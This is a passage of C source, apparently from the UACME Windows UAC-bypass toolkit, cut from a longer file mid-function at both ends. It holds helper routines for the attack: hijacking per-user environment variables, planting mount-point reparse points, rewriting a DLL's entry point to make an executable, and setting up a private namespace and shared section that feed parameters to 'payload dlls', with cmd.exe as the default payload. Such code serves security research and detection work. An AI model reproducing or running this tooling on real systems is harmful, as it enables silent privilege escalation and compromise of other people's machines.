                    bResult = (RegDeleteValue(hKey, lpVariableName) == ERROR_SUCCESS);
                }
                else {
                    cbData = (DWORD)((1 + _strlen(lpVariableData)) * sizeof(WCHAR));
                    bResult = (RegSetValueEx(hKey, lpVariableName, 0, REG_SZ, (BYTE*)lpVariableData, cbData) == ERROR_SUCCESS);
                }

                RegFlushKey(hKey);
                RegCloseKey(hKey);
                hKey = NULL;
            }

            RegRenameKey(HKEY_CURRENT_USER, szNewKey, lpSubKey);
        }

        if (bResult) {
            SendMessageTimeout(HWND_BROADCAST, WM_SETTINGCHANGE, 0, (LPARAM)lpVariableName, SMTO_BLOCK, 1000, NULL);
        }

    } while (FALSE);

    if (hKey != NULL) {
        RegFlushKey(hKey);
        RegCloseKey(hKey);
    }

    return bResult;
}

/*
* supReplaceEnvironmentVariableValue
*
* Purpose:
*
* Replace/Restore environment variable value.
*
*/
_Success_(return)
BOOL supReplaceEnvironmentVariableValue(
    _In_opt_ LPWSTR lpKeyName,
    _In_ LPWSTR lpVariableName,
    _In_ DWORD dwType,
    _In_opt_ LPWSTR lpVariableData,
    _Out_opt_ PVOID *lpOldVariableData
)
{
    BOOL bNameAllocated = FALSE, bDoBackup = (lpOldVariableData != NULL);
    DWORD cbData;
    NTSTATUS ntStatus = STATUS_UNSUCCESSFUL;
    LPWSTR lpSubKey;
    HANDLE hRoot = NULL, hSubKey = NULL;
    OBJECT_ATTRIBUTES obja;
    UNICODE_STRING usRootKey, usSubKey, usValueName;

    usRootKey.Buffer = NULL;

    do {
        if (lpVariableName == NULL) {
            //
            // Nothing to replace.
            //
            break;
        }

        if (lpVariableData == NULL)
            break;

        if (lpKeyName == NULL)
            lpSubKey = L"Environment";
        else
            lpSubKey = lpKeyName;

        ntStatus = RtlFormatCurrentUserKeyPath(&usRootKey);
        if (!NT_SUCCESS(ntStatus))
            break;

        bNameAllocated = TRUE;

        InitializeObjectAttributes(&obja, &usRootKey, OBJ_CASE_INSENSITIVE, NULL, NULL);
        ntStatus = NtOpenKey(&hRoot, MAXIMUM_ALLOWED, &obja);
        if (!NT_SUCCESS(ntStatus))
            break;

        RtlInitUnicodeString(&usSubKey, lpSubKey);
        obja.RootDirectory = hRoot;
        obja.ObjectName = &usSubKey;

        ntStatus = NtOpenKey(&hSubKey, MAXIMUM_ALLOWED, &obja);
        if (!NT_SUCCESS(ntStatus))
            break;

        RtlInitUnicodeString(&usValueName, lpVariableName);

        if (bDoBackup) {
            cbData = 0;
            //
            // Read the old value; failure is not critical, the value may not be present.
            //
            supRegReadValue(hSubKey, lpVariableName, dwType, lpOldVariableData, &cbData, g_ctx->ucmHeap);
        }

        cbData = (DWORD)((1 + _strlen(lpVariableData)) * sizeof(WCHAR));
        ntStatus = NtSetValueKey(hSubKey, &usValueName, 0, dwType, (BYTE*)lpVariableData, cbData);

        if (NT_SUCCESS(ntStatus)) {
            SendMessageTimeout(HWND_BROADCAST, WM_SETTINGCHANGE, 0, (LPARAM)lpVariableName, SMTO_BLOCK, 1000, NULL);
        }

    } while (FALSE);

    if (hSubKey) NtClose(hSubKey);
    if (hRoot) NtClose(hRoot);
    if (bNameAllocated) RtlFreeUnicodeString(&usRootKey);

    return NT_SUCCESS(ntStatus);
}

/*
* supDeleteMountPoint
*
* Purpose:
*
* Removes reparse point of type mount_point.
*
*/
BOOL supDeleteMountPoint(
    _In_ HANDLE hDirectory
)
{
    NTSTATUS status;
    IO_STATUS_BLOCK IoStatusBlock;
    REPARSE_GUID_DATA_BUFFER Buffer;

    RtlSecureZeroMemory(&Buffer, sizeof(REPARSE_GUID_DATA_BUFFER));
    Buffer.ReparseTag = IO_REPARSE_TAG_MOUNT_POINT;

    status = NtFsControlFile(hDirectory,
        NULL,
        NULL,
        NULL,
        &IoStatusBlock,
        FSCTL_DELETE_REPARSE_POINT,
        &Buffer,
        REPARSE_GUID_DATA_BUFFER_HEADER_SIZE,
        NULL,
        0);

    if (status == STATUS_NOT_A_REPARSE_POINT) {
        SetLastError(ERROR_INVALID_PARAMETER);
    }
    else {
        supSetLastErrorFromNtStatus(status);
    }

    return NT_SUCCESS(status);
}

/*
* supSetMountPoint
*
* Purpose:
*
* Install reparse point of type mount_point to target.
*
*/
BOOL supSetMountPoint(
    _In_ HANDLE hDirectory,
    _In_ LPCWSTR lpTarget,
    _In_ LPCWSTR lpPrintName
)
{
    ULONG memIO;
    USHORT cbTarget, cbPrintName, reparseDataLength;
    NTSTATUS status;
    IO_STATUS_BLOCK IoStatusBlock;
    REPARSE_DATA_BUFFER* Buffer;

    if ((lpTarget == NULL) || (lpPrintName == NULL)) {
        SetLastError(ERROR_INVALID_PARAMETER);
        return FALSE;
    }

    //
    // Calculate required buffer size.
    // Header + length of input strings + safe space.
    //
    cbTarget = (USHORT)(_strlen(lpTarget) * sizeof(WCHAR));
    cbPrintName = (USHORT)(_strlen(lpPrintName) * sizeof(WCHAR));

    reparseDataLength = cbTarget + cbPrintName + 12;
    memIO = (ULONG)(reparseDataLength + REPARSE_DATA_BUFFER_HEADER_LENGTH);

    Buffer = (REPARSE_DATA_BUFFER*)supHeapAlloc((SIZE_T)memIO);
    if (Buffer == NULL)
        return FALSE;

    //
    // Setup reparse point structure.
    //
    Buffer->ReparseTag = IO_REPARSE_TAG_MOUNT_POINT;
    Buffer->ReparseDataLength = reparseDataLength;

    //
    // Add Target to PathBuffer.
    //
    Buffer->MountPointReparseBuffer.SubstituteNameOffset = 0;
    Buffer->MountPointReparseBuffer.SubstituteNameLength = cbTarget;

    RtlCopyMemory(Buffer->MountPointReparseBuffer.PathBuffer,
        lpTarget,
        cbTarget);

    //
    // Add PrintName to PathBuffer.
    //
    Buffer->MountPointReparseBuffer.PrintNameOffset = cbTarget + sizeof(UNICODE_NULL);
    Buffer->MountPointReparseBuffer.PrintNameLength = cbPrintName;

    RtlCopyMemory(&Buffer->MountPointReparseBuffer.PathBuffer[(cbTarget / sizeof(WCHAR)) + 1],
        lpPrintName,
        cbPrintName);

    //
    // Set reparse point.
    //
    status = NtFsControlFile(hDirectory,
        NULL,
        NULL,
        NULL,
        &IoStatusBlock,
        FSCTL_SET_REPARSE_POINT,
        Buffer,
        memIO,
        NULL,
        0);

    supHeapFree(Buffer);
    supSetLastErrorFromNtStatus(status);
    return NT_SUCCESS(status);
}

/*
* supOpenDirectoryForReparse
*
* Purpose:
*
* Open directory handle to set reparse point.
*
*/
HANDLE supOpenDirectoryForReparse(
    _In_ LPCWSTR lpDirectory
)
{
    NTSTATUS status = STATUS_UNSUCCESSFUL;
    HANDLE hReparseDirectory = NULL;
    UNICODE_STRING usReparseDirectory;
    IO_STATUS_BLOCK IoStatusBlock;
    OBJECT_ATTRIBUTES ObjectAttributes;

    usReparseDirectory.Buffer = NULL;
    if (RtlDosPathNameToNtPathName_U(lpDirectory, &usReparseDirectory, NULL, NULL)) {

        InitializeObjectAttributes(&ObjectAttributes, &usReparseDirectory, OBJ_CASE_INSENSITIVE, NULL, NULL);

        status = NtCreateFile(&hReparseDirectory,
            FILE_ALL_ACCESS,
            &ObjectAttributes,
            &IoStatusBlock,
            NULL,
            0,
            FILE_SHARE_READ | FILE_SHARE_WRITE,
            FILE_OPEN,
            FILE_OPEN_REPARSE_POINT | FILE_SYNCHRONOUS_IO_NONALERT,
            NULL,
            0);

        RtlFreeUnicodeString(&usReparseDirectory);
    }

    supSetLastErrorFromNtStatus(status);
    return hReparseDirectory;
}

/*
* supWinstationToName
*
* Purpose:
*
* Retrieves winstation string name.
*
*/
BOOL supWinstationToName(
    _In_opt_ HWINSTA hWinsta,
    _In_ LPWSTR lpBuffer,
    _In_ DWORD cbBuffer,
    _Out_ PDWORD BytesNeeded
)
{
    HWINSTA hObject;

    if (hWinsta == NULL)
        hObject = GetProcessWindowStation();
    else
        hObject = hWinsta;

    return GetUserObjectInformation(
        hObject,
        UOI_NAME,
        lpBuffer,
        cbBuffer,
        BytesNeeded);
}

/*
* supDesktopToName
*
* Purpose:
*
* Retrieves desktop string name.
*
*/
BOOL supDesktopToName(
    _In_opt_ HDESK hDesktop,
    _In_ LPWSTR lpBuffer,
    _In_ DWORD cbBuffer,
    _Out_ PDWORD BytesNeeded
)
{
    HDESK hObject;

    if (hDesktop == NULL)
        hObject = GetThreadDesktop(GetCurrentThreadId());
    else
        hObject = hDesktop;

    return GetUserObjectInformation(
        hObject,
        UOI_NAME,
        lpBuffer,
        cbBuffer,
        BytesNeeded);
}

/*
* supReplaceDllEntryPoint
*
* Purpose:
*
* Replace DLL entry point and optionally convert dll to exe.
*
*/
BOOL supReplaceDllEntryPoint(
    _In_ PVOID DllImage,
    _In_ ULONG SizeOfDllImage,
    _In_ LPCSTR lpEntryPointName,
    _In_ BOOL fConvertToExe
)
{
    BOOL bResult = FALSE;
    PIMAGE_NT_HEADERS NtHeaders;
    DWORD DllVirtualSize;
    PVOID DllBase, EntryPoint;

    NtHeaders = RtlImageNtHeader(DllImage);
    if (NtHeaders) {

        DllVirtualSize = 0;
        DllBase = PELoaderLoadImage(DllImage, &DllVirtualSize);
        if (DllBase) {
            //
            // Get the new entrypoint.
            //
            EntryPoint = PELoaderGetProcAddress(DllBase, (PCHAR)lpEntryPointName);
            if (EntryPoint) {
                //
                // Set new entrypoint and recalculate checksum.
                //
                NtHeaders->OptionalHeader.AddressOfEntryPoint =
                    (ULONG)((ULONG_PTR)EntryPoint - (ULONG_PTR)DllBase);

                if (fConvertToExe)
                    NtHeaders->FileHeader.Characteristics &= ~IMAGE_FILE_DLL;

                NtHeaders->OptionalHeader.CheckSum =
                    supCalculateCheckSumForMappedFile(DllImage, SizeOfDllImage);

                bResult = TRUE;
            }
            VirtualFree(DllBase, 0, MEM_RELEASE);
        }
    }
    return bResult;
}

/*
* supQuerySystemRoot
*
* Purpose:
*
* Query system root value from registry to the program global context.
*
*/
BOOL supQuerySystemRoot(
    _Inout_ PVOID Context)
{
    BOOL bResult = FALSE, needBackslash = FALSE;
    NTSTATUS Status;
    UNICODE_STRING UString;
    OBJECT_ATTRIBUTES ObjectAttributes;
    PWCHAR lpData = NULL;
    SIZE_T ccm = 0, cch = 0;
    HANDLE hKey = NULL;
    PUACMECONTEXT context = (PUACMECONTEXT)Context;

    WCHAR szBuffer[MAX_PATH];
    WCHAR szSystem32Prep[] = { L's', L'y', L's', L't', L'e', L'm', L'3', L'2', L'\\', 0 };

    ULONG Length = 0, cbSystem32Prep = sizeof(szSystem32Prep) - sizeof(WCHAR);

    do {
        _strcpy(szBuffer, T_REGISTRY_PREP);
        _strcat(szBuffer, T_WINDOWS_CURRENT_VERSION);
        RtlInitUnicodeString(&UString, szBuffer);
        InitializeObjectAttributes(&ObjectAttributes, &UString, OBJ_CASE_INSENSITIVE, NULL, NULL);

        Status = NtOpenKey(&hKey, KEY_READ, &ObjectAttributes);
        if (!NT_SUCCESS(Status))
            break;

        Status = supRegReadValue(hKey, L"SystemRoot", REG_SZ, (PVOID*)&lpData, &Length, context->ucmHeap);
        if (!NT_SUCCESS(Status) || (lpData == NULL))
            break;

        cch = _strlen(lpData);
        if (cch == 0) {
            SetLastError(ERROR_INVALID_DATA);
            break;
        }

        needBackslash = (lpData[cch - 1] != L'\\');

        ccm = cch + (needBackslash ? 1 : 0) + (cbSystem32Prep / sizeof(WCHAR));
        if (ccm >= MAX_PATH) {
            SetLastError(ERROR_BUFFER_OVERFLOW);
            break;
        }

        _strncpy(context->szSystemRoot, MAX_PATH, lpData, cch + 1);

        if (needBackslash) {
            context->szSystemRoot[cch] = L'\\';
            context->szSystemRoot[cch + 1] = UNICODE_NULL;
        }

        _strcpy(context->szSystemDirectory, context->szSystemRoot);
        _strcat(context->szSystemDirectory, szSystem32Prep);

        bResult = TRUE;

    } while (FALSE);

    if (hKey) NtClose(hKey);
    if (lpData) RtlFreeHeap(context->ucmHeap, 0, lpData);

    return bResult;
}

#define SI_MAX_BUFFER_LENGTH (512 * 1024 * 1024)

/*
* supGetSystemInfo
*
* Purpose:
*
* Returns buffer with system information by given InfoClass.
*
* Returned buffer must be freed with supHeapFree after usage.
*
*/
PVOID supGetSystemInfo(
    _In_ SYSTEM_INFORMATION_CLASS SystemInformationClass
)
{
    PVOID buffer = NULL;
    ULONG bufferSize = PAGE_SIZE;
    NTSTATUS ntStatus;
    ULONG returnedLength = 0;

    buffer = supHeapAlloc((SIZE_T)bufferSize);
    if (buffer == NULL)
        return NULL;

    while ((ntStatus = NtQuerySystemInformation(
        SystemInformationClass,
        buffer,
        bufferSize,
        &returnedLength)) == STATUS_INFO_LENGTH_MISMATCH)
    {
        supHeapFree(buffer);
        bufferSize *= 2;

        if (bufferSize > SI_MAX_BUFFER_LENGTH)
            return NULL;

        buffer = supHeapAlloc((SIZE_T)bufferSize);
        if (buffer == NULL)
            return NULL;
    }

    if (NT_SUCCESS(ntStatus)) {
        return buffer;
    }

    if (buffer)
        supHeapFree(buffer);

    return NULL;
}

/*
* supIsCorImageFile
*
* Purpose:
*
* Return true if image has CliHeader entry, false otherwise.
*
*/
BOOL supIsCorImageFile(
    _In_ PVOID ImageBase
)
{
    ULONG sz = 0;
    IMAGE_COR20_HEADER* CliHeader;

    CliHeader = (IMAGE_COR20_HEADER*)RtlImageDirectoryEntryToData(ImageBase, TRUE,
        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR, &sz);

    return ((CliHeader != NULL) && (sz >= sizeof(IMAGE_COR20_HEADER)));
}

/*
* supCreateDirectory
*
* Purpose:
*
* Native create directory.
*
*/
NTSTATUS supCreateDirectory(
    _Out_opt_ PHANDLE phDirectory,
    _In_ OBJECT_ATTRIBUTES* ObjectAttributes,
    _In_ ULONG DirectoryShareFlags,
    _In_ ULONG DirectoryAttributes
)
{
    NTSTATUS status;
    HANDLE DirectoryHandle = NULL;
    IO_STATUS_BLOCK IoStatusBlock;

    if (DirectoryAttributes == 0)
        DirectoryAttributes = FILE_ATTRIBUTE_NORMAL;

    status = NtCreateFile(
        &DirectoryHandle,
        FILE_GENERIC_WRITE,
        ObjectAttributes,
        &IoStatusBlock,
        NULL,
        DirectoryAttributes,
        DirectoryShareFlags,
        FILE_OPEN_IF,
        FILE_DIRECTORY_FILE,
        NULL,
        0);

    if (NT_SUCCESS(status)) {
        if (phDirectory)
            *phDirectory = DirectoryHandle;
    }
    return status;
}

/*
* supxCreateBoundaryDescriptorSID
*
* Purpose:
*
* Create special SID to access isolated namespace.
*
*/
PSID supxCreateBoundaryDescriptorSID(
    SID_IDENTIFIER_AUTHORITY* SidAuthority,
    UCHAR SubAuthorityCount,
    ULONG* SubAuthorities
)
{
    BOOL bResult = FALSE;
    ULONG i;
    PSID pSid = NULL;

    do {
        pSid = supHeapAlloc(RtlLengthRequiredSid(SubAuthorityCount));
        if (pSid == NULL)
            break;

        if (!NT_SUCCESS(RtlInitializeSid(pSid, SidAuthority, SubAuthorityCount)))
            break;

        for (i = 0; i < SubAuthorityCount; i++)
            *RtlSubAuthoritySid(pSid, i) = SubAuthorities[i];

        bResult = TRUE;

    } while (FALSE);

    if (bResult == FALSE) {
        if (pSid) supHeapFree(pSid);
        pSid = NULL;
    }

    return pSid;
}

/*
* supCreateSharedParametersBlock
*
* Purpose:
*
* Create parameters block to be shared with payload dlls.
*
*/
BOOL supCreateSharedParametersBlock(
    _In_ PVOID ucmContext)
{
    BOOL bResult = FALSE;
    ULONG r;
    HANDLE hBoundary = NULL;
    PVOID SharedBuffer = NULL;
    SIZE_T ViewSize;
    PUACMECONTEXT context = (PUACMECONTEXT)ucmContext;
    LARGE_INTEGER liSectionSize;
    PSID pWorldSid = NULL;
    SID_IDENTIFIER_AUTHORITY SidWorldAuthority = SECURITY_WORLD_SID_AUTHORITY;
    UNICODE_STRING usName;
    OBJECT_ATTRIBUTES obja = RTL_INIT_OBJECT_ATTRIBUTES((PUNICODE_STRING)NULL, 0);
    UACME_PARAM_BLOCK ParamBlock;
    ULONG SubAuthoritiesWorld[] = { SECURITY_WORLD_RID };
    WCHAR szBoundaryDescriptorName[128];
    WCHAR szObjectName[128];

    RtlSecureZeroMemory(&szBoundaryDescriptorName, sizeof(szBoundaryDescriptorName));
    supGenerateSharedObjectName((WORD)AKAGI_BDESCRIPTOR_NAME_ID, szBoundaryDescriptorName);
    RtlInitUnicodeString(&usName, szBoundaryDescriptorName);

    //
    // Fill parameters block.
    //
    RtlSecureZeroMemory(&ParamBlock, sizeof(ParamBlock));

    if (context->OptionalParameterLength != 0) {
        _strncpy(ParamBlock.szParameter, MAX_PATH,
            context->szOptionalParameter, MAX_PATH);
    }

    ParamBlock.AkagiFlag = context->AkagiFlag;
    ParamBlock.SessionId = NtCurrentPeb()->SessionId;
    supWinstationToName(NULL, ParamBlock.szWinstation, MAX_PATH * 2, &r);
    supDesktopToName(NULL, ParamBlock.szDesktop, MAX_PATH * 2, &r);

    do {
        //
        // Create and assign boundary descriptor.
        //
        hBoundary = RtlCreateBoundaryDescriptor(&usName, 0);
        if (hBoundary == NULL)
            break;

        pWorldSid = supxCreateBoundaryDescriptorSID(
            &SidWorldAuthority,
            1,
            SubAuthoritiesWorld);

        if (pWorldSid == NULL)
            break;

        if (!NT_SUCCESS(RtlAddSIDToBoundaryDescriptor(&hBoundary, pWorldSid))) {
            break;
        }

        //
        // Create private namespace.
        //
        if (!NT_SUCCESS(NtCreatePrivateNamespace(
            &context->SharedContext.hIsolatedNamespace,
            MAXIMUM_ALLOWED,
            &obja,
            hBoundary)))
        {
            break;
        }

        obja.Attributes = OBJ_CASE_INSENSITIVE;
        obja.RootDirectory = context->SharedContext.hIsolatedNamespace;
        obja.ObjectName = &usName;

        //
        // Create completion event.
        //
        RtlSecureZeroMemory(&szObjectName, sizeof(szObjectName));
        supGenerateSharedObjectName((WORD)AKAGI_COMPLETION_EVENT_ID, szObjectName);
        RtlInitUnicodeString(&usName, szObjectName);
        _strcpy(ParamBlock.szSignalObject, szObjectName);

        //
        // Param block is complete. Calc crc32.
        //
        ParamBlock.Crc32 = RtlComputeCrc32(0, &ParamBlock, sizeof(ParamBlock));

        if (!NT_SUCCESS(NtCreateEvent(
            &context->SharedContext.hCompletionEvent,
            EVENT_ALL_ACCESS,
            &obja,
            NotificationEvent,
            FALSE)))
        {
            break;
        }

        //
        // Create shared section.
        //
        liSectionSize.QuadPart = PAGE_SIZE;
        ViewSize = PAGE_SIZE;

        RtlSecureZeroMemory(&szObjectName, sizeof(szObjectName));
        supGenerateSharedObjectName((WORD)AKAGI_SHARED_SECTION_ID, szObjectName);
        RtlInitUnicodeString(&usName, szObjectName);

        if (NT_SUCCESS(NtCreateSection(
            &context->SharedContext.hSharedSection,
            SECTION_MAP_READ | SECTION_MAP_WRITE | SECTION_QUERY,
            &obja,
            &liSectionSize,
            PAGE_READWRITE,
            SEC_COMMIT,
            NULL)))
        {
            //
            // Write data to shared section.
            //
            if (NT_SUCCESS(NtMapViewOfSection(
                context->SharedContext.hSharedSection,
                NtCurrentProcess(),
                &SharedBuffer,
                0,
                PAGE_SIZE,
                NULL,
                &ViewSize,
                ViewUnmap,
                MEM_TOP_DOWN,
                PAGE_READWRITE)))
            {
                RtlSecureZeroMemory(SharedBuffer, PAGE_SIZE);
                RtlCopyMemory(SharedBuffer, &ParamBlock, sizeof(ParamBlock));
                NtUnmapViewOfSection(NtCurrentProcess(), SharedBuffer);
                bResult = TRUE;
            }
        }

    } while (FALSE);

    //
    // Cleanup.
    //
    if (pWorldSid) supHeapFree(pWorldSid);
    if (hBoundary) RtlDeleteBoundaryDescriptor(hBoundary);

    if (bResult == FALSE) {
        if (context->SharedContext.hIsolatedNamespace) {
            NtDeletePrivateNamespace(context->SharedContext.hIsolatedNamespace);
            NtClose(context->SharedContext.hIsolatedNamespace);
        }
    }

    return bResult;
}

/*
* supDestroySharedParametersBlock
*
* Purpose:
*
* Free shared resources.
*
*/
VOID supDestroySharedParametersBlock(
    _In_ PVOID ucmContext)
{
    PUACMECONTEXT context = (PUACMECONTEXT)ucmContext;

    if (context->SharedContext.hIsolatedNamespace) {
        if (context->SharedContext.hCompletionEvent)
            NtClose(context->SharedContext.hCompletionEvent);
        if (context->SharedContext.hSharedSection)
            NtClose(context->SharedContext.hSharedSection);
        NtDeletePrivateNamespace(context->SharedContext.hIsolatedNamespace);
        NtClose(context->SharedContext.hIsolatedNamespace);
    }
}

/*
* supCreateUacmeContext
*
* Purpose:
*
* Allocate and fill program contexts.
*
*/
PVOID supCreateUacmeContext(
    _In_ ULONG Method,
    _In_reads_or_z_opt_(OptionalParameterLength) LPWSTR OptionalParameter,
    _In_ ULONG OptionalParameterLength,
    _In_ PVOID DecompressRoutine
)
{
    BOOLEAN IsWow64;
    ULONG Seed, NtBuildNumber = 0;
    PUACMECONTEXT Context;
    HANDLE ContextHeap = NtCurrentPeb()->ProcessHeap;
#ifdef _UCM_CONSOLE
    HMODULE hNtdll;
#endif
    RTL_OSVERSIONINFOW osv;

    UNREFERENCED_PARAMETER(Method);

    if (OptionalParameterLength > MAX_PATH)
        return NULL;

    IsWow64 = supIsProcess32bit(NtCurrentProcess());

    RtlSecureZeroMemory(&osv, sizeof(osv));
    osv.dwOSVersionInfoSize = sizeof(osv);
    RtlGetVersion((PRTL_OSVERSIONINFOW)&osv);
    NtBuildNumber = osv.dwBuildNumber;
    if (NtBuildNumber < NT_WIN7_RTM) {
        return NULL;
    }

    Context = RtlAllocateHeap(ContextHeap, HEAP_ZERO_MEMORY, sizeof(UACMECONTEXT));
    if (Context == NULL) {
        return NULL;
    }

    //
    // Create private heap, enable termination on corruption.
    //
    Context->ucmHeap = RtlCreateHeap(HEAP_GROWABLE, NULL, 0, 0, NULL, NULL);
    if (Context->ucmHeap == NULL) {
        RtlFreeHeap(ContextHeap, 0, Context);
        return NULL;
    }
    RtlSetHeapInformation(Context->ucmHeap, HeapEnableTerminationOnCorruption, NULL, 0);

    //
    // Set Fubuki flag.
    //
    Context->AkagiFlag = AKAGI_FLAG_KILO;

    //
    // Remember NtBuildNumber.
    //
    Context->dwBuildNumber = NtBuildNumber;

    //
    // Set Cookie for supEncode/DecodePointer.
    //
    Seed = USER_SHARED_DATA->Cookie;
    Context->Cookie = RtlRandomEx((PULONG)&Seed);

    //
    // Remember Wow64 process state.
    //
    Context->IsWow64 = IsWow64;

    //
    // Save OptionalParameter if present.
    //
    if (OptionalParameterLength) {
        _strncpy(Context->szOptionalParameter, MAX_PATH,
            OptionalParameter, OptionalParameterLength);
        Context->OptionalParameterLength = OptionalParameterLength;
    }

    //
    // Set IFileOperations flags.
    //
    if (NtBuildNumber > 14997) {
        Context->IFileOperationFlags = FOF_NOCONFIRMATION |
            FOFX_NOCOPYHOOKS |
            FOFX_REQUIREELEVATION;
    }
    else {
        Context->IFileOperationFlags = FOF_NOCONFIRMATION |
            FOF_SILENT |
            FOFX_SHOWELEVATIONPROMPT |
            FOFX_NOCOPYHOOKS |
            FOFX_REQUIREELEVATION;
    }

    //
    // Query basic directories.
    //
    // 1. SystemRoot
    // 2. System32
    if (!supQuerySystemRoot(Context)) {
        RtlDestroyHeap(Context->ucmHeap);
        RtlFreeHeap(ContextHeap, 0, Context);
        return NULL;
    }
    // 3. Temp
    supExpandEnvironmentStrings(L"%temp%\\", Context->szTempDirectory, MAX_PATH);

    // 4. Current directory
    if (GetCurrentDirectory(MAX_PATH, Context->szCurrentDirectory) < MAX_PATH) {
        supPathAddBackSlash(Context->szCurrentDirectory);
    }

    //
    // Default payload path.
    //
    _strcpy(Context->szDefaultPayload, Context->szSystemDirectory);
    _strcat(Context->szDefaultPayload, CMD_EXE);

    Context->DecompressRoutine = (pfnDecompressPayload)supDecodePointer(DecompressRoutine);

#ifdef _UCM_CONSOLE
    hNtdll = GetModuleHandle(L"ntdll.dll");
    if (hNtdll) {
        Context->swprintf_s = (pswprintf_s)GetProcAddress(hNtdll, "swprintf_s");
    }
#else
    Context->swprintf_s = (PVOID)-1;
#endif

    return (PVOID)Context;
}

/*
* supDestroyUacmeContext
*
* Purpose:
*
* Destroy program contexts.
*
*/
VOID supDestroyUacmeContext(
    _In_ PVOID Context
)
{
    PUACMECONTEXT context = (PUACMECONTEXT)Context;

    RtlDestroyHeap(context->ucmHeap);
    RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, Context);
}

/*
* supDecodeAndWriteBufferToFile
*
* Purpose:
*
* Create new file and write decoded buffer to it.
*
*/
BOOL supDecodeAndWriteBufferToFile(
    _In_ LPWSTR lpFileName,
    _In_ CONST PVOID Buffer,
    _In_ DWORD BufferSize,
    _In_ ULONG Key
)
{
    BOOL bResult;
    PVOID p;
    SIZE_T Size = ALIGN_UP_BY(BufferSize, PAGE_SIZE);

    p = supVirtualAlloc(&Size, DEFAULT_ALLOCATION_TYPE | MEM_TOP_DOWN, DEFAULT_PROTECT_TYPE, NULL);
    if (p) {
        RtlCopyMemory(p, Buffer, BufferSize);
        EncodeBuffer(p, BufferSize, Key);
        bResult = supWriteBufferToFile(lpFileName, p, BufferSize);
        supSecureVirtualFree(p, Size, NULL);
        return bResult;
    }

    return FALSE;
}

/*
* supEnableDisableWow64Redirection
*
* Purpose:
*
* Enable/Disable Wow64 redirection.
*
*/
NTSTATUS supEnableDisableWow64Redirection(
    _In_ BOOL bDisable
)
{
    PVOID OldValue = NULL, Value;

    if (bDisable)
        Value = IntToPtr(TRUE);
    else
        Value = IntToPtr(FALSE);

    return RtlWow64EnableFsRedirectionEx(Value, &OldValue);
}

/*
* supGetProcessDebugObject
*
* Purpose:
*
* Reference process debug object.
*
*/
NTSTATUS supGetProcessDebugObject(
    _In_ HANDLE ProcessHandle,
    _Out_ PHANDLE DebugObjectHandle)
{
    return NtQueryInformationProcess(
        ProcessHandle,
        ProcessDebugObjectHandle,
        DebugObjectHandle,
        sizeof(HANDLE),
        NULL);
}

/*
* supIsProcessRunning
*
* Purpose:
*
* Return TRUE if the given process is running in current session.
*
*/
BOOL supIsProcessRunning(
    _In_ LPWSTR ProcessName
)
{
    BOOL bResult = FALSE;
    ULONG nextEntryDelta = 0;
    PVOID processList;
    UNICODE_STRING lookupPsName;

    union {
        PSYSTEM_PROCESS_INFORMATION Processes;
        PBYTE ListRef;
    } List;

    processList = supGetSystemInfo(SystemProcessInformation);
    if (processList == NULL)
        return bResult;

    List.ListRef = (PBYTE)processList;

    RtlInitUnicodeString(&lookupPsName, ProcessName);

    do {
        List.ListRef += nextEntryDelta;

        if (List.Processes->SessionId == NtCurrentPeb()->SessionId) {
            if (RtlEqualUnicodeString(&lookupPsName, &List.Processes->ImageName, TRUE)) {
                bResult = TRUE;
                break;
            }
        }

        nextEntryDelta = List.Processes->NextEntryDelta;
    } while (nextEntryDelta);

    supHeapFree(processList);
    return bResult;
}

/*
* supBinTextEncode
*
* Purpose:
*
* Create pseudo random string from UI64 value.
*
*/
VOID supBinTextEncode(
    _In_ unsigned __int64 x,
    _Inout_ wchar_t* s
)
{
    char tbl[64];
    char c = 0;
    int p;

    //
    // Alphabet: A-Z, a-z, 0-9, '-', '_' (64 symbols, one per 6-bit index).
    //
    tbl[62] = '-';
    tbl[63] = '_';
    for (c = 0; c < 26; ++c) {
        tbl[c] = 'A' + c;
        tbl[26 + c] = 'a' + c;
        if (c < 10)
            tbl[52 + c] = '0' + c;
    }

    //
    // Emit 13 symbols; each takes 6 bits while the value advances by 5,
    // so neighbouring symbols overlap by one bit (deterministic for a given x).
    //
    for (p = 0; p < 13; ++p) {
        c = x & 0x3f;
        x >>= 5;
        *s = (wchar_t)tbl[c];
        ++s;
    }
    *s = 0;
}

/*
* supGenerateSharedObjectName
*
* Purpose:
*
* Create pseudo random object name from its ID.
*
*/
VOID supGenerateSharedObjectName(
    _In_ WORD ObjectId,
    _Inout_ LPWSTR lpBuffer
)
{
    ULARGE_INTEGER value;

    value.LowPart = MAKELONG(
        MAKEWORD(UCM_VERSION_BUILD, UCM_VERSION_REVISION),
        MAKEWORD(UCM_VERSION_MINOR, UCM_VERSION_MAJOR));

    value.HighPart = MAKELONG(UACME_SHARED_BASE_ID, ObjectId);

    supBinTextEncode(value.QuadPart, lpBuffer);
}

/*
* supSetGlobalCompletionEvent
*
* Purpose:
*
* Set global completion event state to signaled.
*
*/
VOID supSetGlobalCompletionEvent(
    VOID)
{
    if (g_ctx->SharedContext.hCompletionEvent) {
        SetEvent(g_ctx->SharedContext.hCompletionEvent);
    }
}

/*
* supWaitForGlobalCompletionEvent
*
* Purpose:
*
* Wait a little bit for things to complete.
*
*/
NTSTATUS supWaitForGlobalCompletionEvent(
    VOID)
{
    LARGE_INTEGER liDueTime;

    if (g_ctx->SharedContext.hCompletionEvent) {
#ifdef _DEBUG
        liDueTime.QuadPart = -(LONGLONG)UInt32x32To64(10000, 10000);
#else
        liDueTime.QuadPart = -(LONGLONG)UInt32x32To64(50000, 10000);
#endif
        return NtWaitForSingleObject(g_ctx->SharedContext.hCompletionEvent, FALSE, &liDueTime);
    }

    return STATUS_WAIT_0;
}

/*
* supOpenClassesKey
*
* Purpose:
*
* Open required subkey of current user.
*
*/
NTSTATUS supOpenClassesKey(
    _In_opt_ PUNICODE_STRING UserRegEntry,
    _Out_ PHANDLE KeyHandle
)
{
    UNICODE_STRING usRootKey, usKeyName;
    HANDLE rootKeyHandle = NULL, keyHandle = NULL;
    OBJECT_ATTRIBUTES obja;
    NTSTATUS ntStatus;
    ULONG dummy;

    *KeyHandle = NULL;

    if (UserRegEntry == NULL) {
        ntStatus = RtlFormatCurrentUserKeyPath(&usRootKey);
        if (!NT_SUCCESS(ntStatus))
            return ntStatus;
    }
    else {
        RtlCopyMemory(&usRootKey, UserRegEntry, sizeof(UNICODE_STRING));
    }

    InitializeObjectAttributes(&obja, &usRootKey, OBJ_CASE_INSENSITIVE, NULL, NULL);

